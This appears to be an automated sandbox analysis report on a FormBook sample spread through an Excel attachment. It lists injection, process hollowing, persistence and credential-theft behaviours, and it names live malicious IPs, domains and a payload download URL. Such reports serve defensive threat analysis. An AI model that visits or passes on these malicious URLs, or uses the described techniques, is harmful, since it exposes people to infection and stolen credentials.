Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 91.195.241.137 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Memory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 260000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: F80000 Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section unmapped: C:\Program Files (x86)\Mozilla Firefox\firefox.exe base address: A40000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe Jump to behavior
Source: explorer.exe, 00000006.00000000.2195363128.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.2195363128.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.2194662661.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2195363128.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\chkdsk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Windows\SysWOW64\chkdsk.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 323718 Sample: PO11272020.xlsx Startdate: 27/11/2020 Architecture: WINDOWS Score: 100 66 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 Antivirus detection for URL or domain 2->70 72 17 other signatures 2->72 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 37 19 2->15         started        process3 dnsIp4 64 amachichywsdyjakelogontothecomputewsrty.ydns.eu 162.251.123.239, 49165, 80 UNREAL-SERVERSUS Canada 10->64 48 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->48 dropped 50 C:\Users\Public\vbc.exe, PE32 10->50 dropped 96 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->96 17 vbc.exe 1 10->17         started        52 C:\Users\user\Desktop\~$PO11272020.xlsx, data 15->52 dropped file5 signatures6 process7 file8 44 C:\Users\user\AppData\Roaming\...\vbc.exe, PE32 17->44 dropped 74 Drops PE files to the startup folder 17->74 76 Tries to detect virtualization through RDTSC time measurements 17->76 78 Injects a PE file into a foreign processes 17->78 21 vbc.exe 17->21         started        signatures9 process10 signatures11 80 Modifies the context of a thread in another process (thread injection) 21->80 82 Maps a DLL or memory area into another process 21->82 84 Sample uses process hollowing technique 21->84 86 Queues an APC in another process (thread injection) 21->86 24 explorer.exe 21->24 injected process12 dnsIp13 58 www.gedefo.com 91.195.241.137, 49166, 49167, 80 SEDO-ASDE Germany 24->58 60 letstalkop.com 184.168.131.241, 49168, 49169, 80 AS-26496-GO-DADDY-COM-LLCUS United States 24->60 62 2 other IPs or domains 24->62 88 System process connects to network (likely due to code injection or exploit) 24->88 28 chkdsk.exe 14 24->28         started        32 vbc.exe 24->32         started        34 NETSTAT.EXE 24->34         started        36 autochk.exe 24->36         started        signatures14 process15 file16 54 C:\Users\user\AppData\...\98-logrv.ini, data 28->54 dropped 56 C:\Users\user\AppData\...\98-logri.ini, data 28->56 dropped 98 Detected FormBook malware 28->98 100 Tries to steal Mail credentials (via file access) 28->100 102 Tries to harvest and steal browser information (history, passwords, etc) 28->102 108 3 other signatures 28->108 38 firefox.exe 1 28->38         started        104 Injects a PE file into a foreign processes 32->104 41 vbc.exe 32->41         started        106 Tries to detect virtualization through RDTSC time measurements 34->106 signatures17 process18 file19 46 C:\Users\user\AppData\...\98-logrf.ini, data 38->46 dropped 90 Modifies the context of a thread in another process (thread injection) 41->90 92 Maps a DLL or memory area into another process 41->92 94 Sample uses process hollowing technique 41->94 signatures20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.195.241.137
 unknown Germany
47846 SEDO-ASDE true
162.251.123.239
 unknown Canada
64236 UNREAL-SERVERSUS true
184.168.131.241
 unknown United States
26496 AS-26496-GO-DADDY-COM-LLCUS true

Contacted Domains

Name IP Active
www.gedefo.com 91.195.241.137 true
amachichywsdyjakelogontothecomputewsrty.ydns.eu 162.251.123.239 true
letstalkop.com 184.168.131.241 true
www.letstalkop.com unknown unknown
www.realestateworld.club unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.letstalkop.com/zsh/ true
  • Avira URL Cloud: safe
 unknown
http://amachichywsdyjakelogontothecomputewsrty.ydns.eu/amchdoc/vbc.exe true
  • Avira URL Cloud: malware
 unknown